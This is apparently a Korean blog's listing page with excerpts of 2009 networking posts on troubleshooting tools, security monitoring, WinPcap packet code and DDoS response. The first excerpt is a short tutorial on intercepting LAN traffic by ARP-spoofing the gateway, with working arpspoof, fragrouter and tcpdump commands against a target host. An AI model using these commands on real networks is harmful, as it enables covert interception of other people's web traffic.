네트워크 (LAN,WAN)163 dsniff 이용한 패킷 스니핑 (Packet Sniff) 동일 네트웍 상에 있는 컴퓨터 들은, gateway 의 mac주소를 arp spoofing 하는 방법으로 밖으로 나가는 패킷들을 sniffing 할 수 있다. dsniff 란 툴을 이용하면 이것들을 쉽게 할 수 있다. 콘솔을 3개 띄워서 각각의 명령어를 친다. 1. gateway 의 주소를 속인다 $ sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 2. 들어오는 패킷을 외부로 라우팅 해준다. (이렇게 해야 실제 컴퓨터를 사용하는 사람은 기존과 똑같이 인터넷을 이용할 수 있다.) $ sudo fragrouter -i wlan0 -B1 3. 원하는 packet 을 캡춰한다. $ sudo tcpdump tcp dst port 80 -i wlan0 -s1500 -w- 만.. 2009. 6. 3. 네트워크 트러블슈팅 도구 1. 호스트 설정 a. ps 개별 프로세스를 빠르게 보여주지만 시스템 상태의 모든 것을 정확하게 보여주는 것은 아니다. ps가 보여주지 않는다고 해서 그런 서비스가 가동되지 않고 있다는 의미가 아니다. 단지 지금 동작 중인 프로세스가 없다는 것 뿐이다. * 같은 PPID를 가지는 프로세스를 지켜봄으로써 프로세스를 지나치게 많이 생성해내는 불량 프로세스를 구분해 낼 수도 있다. b. top CPU 사용량이 많은 순서대로 정렬된 프로세스 목록을 주기적으로 갱신하면서 보여준다. * top의 장점은 CPU 자원을 많이 소모하는 프로세스를 집중적으로 볼수 있게 해준다. c. netstat 한 호스트에서의 연결 내역과 제공되는 서비스의 목록을 보여준다. * Recv-Q, Send-Q가 0 이거나 0에 가까워야 한다.. 2009. 6. 1. 시스템 및 네트워크 모니터링을 통한 보안 강화 시스템 및 네트워크 모니터링을 통한 보안 강화 오늘과내일 넷센터 홍석범 (antihong@tt.co.kr) 1. 포트(Port)의 개념과 포트 제어의 모든 것2. 내부 시스템(호스트) 모니터링 소프트웨어 활용3. 외부 시스템(네트워크) 모니터링 소프트웨어 활용 1. 포트의 개념과 포트 제어의 모든 것 시스템의 접속은 포트와 포트간의 통신이라고 할 정도로 포트의 의미는 매우 중요하다. 당연히 시스템의 모니터링을 위해서는 포트의 개념에 대한 이해가 매우 중요한데, 단순히 다음 파트에서 설명할 시스템 및 네트워크 모니터링 프로그램에 대한 사용 방법을 익히는 것도 좋지만 사전에 포트에 대한 기본적인 개념을 이해하고 있어야 각종 현상에 대한 이해 및 상황에 대한 즉각적인 대처가 가능하고, 또한 문제 발생시 원활히.. 2009. 5. 31. Winpcap을 사용하여 패킷을 생성하기 winpcap developer's packs 인 WpdPack를 다운 받으면 그 안에 샘플들이 많이 있어서.... 이런걸 정리할 필요가 있을까 싶지만;;ㅋㅋㅋ 그냥...-; * 자신의 프로젝트에 winpcap을 사용하고자 할 때 설정 방법은 http://www.winpcap.org/docs/docs_40_2/html/group__wpcapsamps.html 이 페이지를 참조하면 됩니다-.. 코드에 주석을 달아놨으니......다른 설명은 패수-ㅋ 바로 코드 보도록 하겠습니다. #include "stdafx.h" #include /* Ethernet Header Structure */ #define ETHER_ADDR_LEN 6 typedef struct ether_header { unsigned char.. 2009. 5. 31. WORM/DDoS 대응 및 NETWORK 보안 2009. 5. 31. 이전 1 ··· 21 22 23 24 25 26 27 ··· 33 다음
